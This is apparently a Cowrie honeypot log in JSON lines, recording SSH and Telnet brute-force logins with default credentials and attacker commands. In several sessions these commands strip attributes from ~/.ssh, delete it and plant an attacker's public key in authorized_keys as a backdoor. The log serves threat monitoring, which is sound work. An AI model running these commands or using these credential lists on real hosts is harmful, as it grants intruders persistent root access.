{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:46:46.499975Z","src_ip":"212.227.235.229","session":"8f061d2751db"}
{"eventid":"cowrie.login.success","username":"root","password":"Idontknow","message":"login attempt [root/Idontknow] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:46:47.304112Z","src_ip":"212.227.235.229","session":"8f061d2751db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:46:47.726883Z","src_ip":"212.227.235.229","session":"8f061d2751db"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:46:47.727534Z","src_ip":"212.227.235.229","session":"8f061d2751db"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:46:47.728616Z","src_ip":"212.227.235.229","session":"8f061d2751db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:46:47.931512Z","src_ip":"212.227.235.229","session":"8f061d2751db"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@123","message":"login attempt [admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-09-09T07:46:47.959979Z","src_ip":"212.227.125.160","session":"a5e926020fae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:46:48.437991Z","src_ip":"212.227.235.229","session":"8f061d2751db"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:46:48.438684Z","src_ip":"212.227.235.229","session":"8f061d2751db"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:46:48.642090Z","src_ip":"212.227.235.229","session":"8f061d2751db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:46:48.643116Z","src_ip":"212.227.235.229","session":"8f061d2751db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39142,"dst_ip":"1.2.3.4","dst_port":22,"session":"897e7014e610","protocol":"ssh","message":"New connection: 212.227.235.229:39142 (1.2.3.4:22) [session: 897e7014e610]","sensor":"my-vps","timestamp":"2025-09-09T07:46:48.842830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:46:48.843556Z","src_ip":"212.227.235.229","session":"897e7014e610"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:46:49.045094Z","src_ip":"212.227.235.229","session":"897e7014e610"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:46:49.892614Z","src_ip":"212.227.235.229","session":"897e7014e610"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:46:51.097465Z","src_ip":"212.227.235.229","session":"897e7014e610"}
{"eventid":"cowrie.session.closed","duration":"31.2","message":"Connection lost after 31.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:46:51.260875Z","src_ip":"212.227.125.160","session":"a5e926020fae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39146,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f641317b077","protocol":"ssh","message":"New connection: 212.227.235.229:39146 (1.2.3.4:22) [session: 9f641317b077]","sensor":"my-vps","timestamp":"2025-09-09T07:46:51.298318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:46:51.299286Z","src_ip":"212.227.235.229","session":"9f641317b077"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:46:51.500822Z","src_ip":"212.227.235.229","session":"9f641317b077"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:46:52.348924Z","src_ip":"212.227.235.229","session":"9f641317b077"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:46:52.551966Z","src_ip":"212.227.235.229","session":"8f061d2751db"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:46:52.552830Z","src_ip":"212.227.235.229","session":"9f641317b077"}
{"eventid":"cowrie.session.closed","duration":"103.7","message":"Connection lost after 103.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:46:58.318267Z","src_ip":"212.227.125.160","session":"25f75c126b46"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:47:21.469397Z","src_ip":"212.227.125.160","session":"ecdffd5dd6df"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":45636,"dst_ip":"1.2.3.4","dst_port":23,"session":"ab8e4bc22773","protocol":"telnet","message":"New connection: 176.65.149.186:45636 (1.2.3.4:23) [session: ab8e4bc22773]","sensor":"my-vps","timestamp":"2025-09-09T07:47:28.543180Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:47:28.581327Z","src_ip":"176.65.149.186","session":"ab8e4bc22773"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:47:28.602803Z","src_ip":"176.65.149.186","session":"ab8e4bc22773"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T07:47:28.604224Z","src_ip":"176.65.149.186","session":"ab8e4bc22773"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T07:47:28.605241Z","src_ip":"176.65.149.186","session":"ab8e4bc22773"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43478,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1da7a3b7ade","protocol":"ssh","message":"New connection: 212.227.125.160:43478 (1.2.3.4:22) [session: d1da7a3b7ade]","sensor":"my-vps","timestamp":"2025-09-09T07:47:47.116674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:47:47.614240Z","src_ip":"212.227.125.160","session":"d1da7a3b7ade"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:47:59.600852Z","src_ip":"212.227.125.160","session":"d1da7a3b7ade"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37906,"dst_ip":"1.2.3.4","dst_port":22,"session":"26717cae2ead","protocol":"ssh","message":"New connection: 212.227.235.229:37906 (1.2.3.4:22) [session: 26717cae2ead]","sensor":"my-vps","timestamp":"2025-09-09T07:48:00.284246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:48:00.285296Z","src_ip":"212.227.235.229","session":"26717cae2ead"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:48:00.576304Z","src_ip":"212.227.235.229","session":"26717cae2ead"}
{"eventid":"cowrie.login.success","username":"root","password":"09N1RCa1Hs31","message":"login attempt [root/09N1RCa1Hs31] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:48:01.785440Z","src_ip":"212.227.235.229","session":"26717cae2ead"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:48:02.443177Z","src_ip":"212.227.235.229","session":"26717cae2ead"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:48:02.444010Z","src_ip":"212.227.235.229","session":"26717cae2ead"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:48:02.444774Z","src_ip":"212.227.235.229","session":"26717cae2ead"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:48:02.735940Z","src_ip":"212.227.235.229","session":"26717cae2ead"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:48:03.384215Z","src_ip":"212.227.235.229","session":"26717cae2ead"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:48:03.384886Z","src_ip":"212.227.235.229","session":"26717cae2ead"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:48:03.680547Z","src_ip":"212.227.235.229","session":"26717cae2ead"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:48:03.681320Z","src_ip":"212.227.235.229","session":"26717cae2ead"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38792,"dst_ip":"1.2.3.4","dst_port":22,"session":"e756fffb17dd","protocol":"ssh","message":"New connection: 212.227.235.229:38792 (1.2.3.4:22) [session: e756fffb17dd]","sensor":"my-vps","timestamp":"2025-09-09T07:48:03.983785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:48:03.984644Z","src_ip":"212.227.235.229","session":"e756fffb17dd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:48:04.283486Z","src_ip":"212.227.235.229","session":"e756fffb17dd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:48:05.519126Z","src_ip":"212.227.235.229","session":"e756fffb17dd"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:48:06.821990Z","src_ip":"212.227.235.229","session":"e756fffb17dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39488,"dst_ip":"1.2.3.4","dst_port":22,"session":"990be1a0c2cd","protocol":"ssh","message":"New connection: 212.227.235.229:39488 (1.2.3.4:22) [session: 990be1a0c2cd]","sensor":"my-vps","timestamp":"2025-09-09T07:48:07.099418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:48:07.100337Z","src_ip":"212.227.235.229","session":"990be1a0c2cd"}
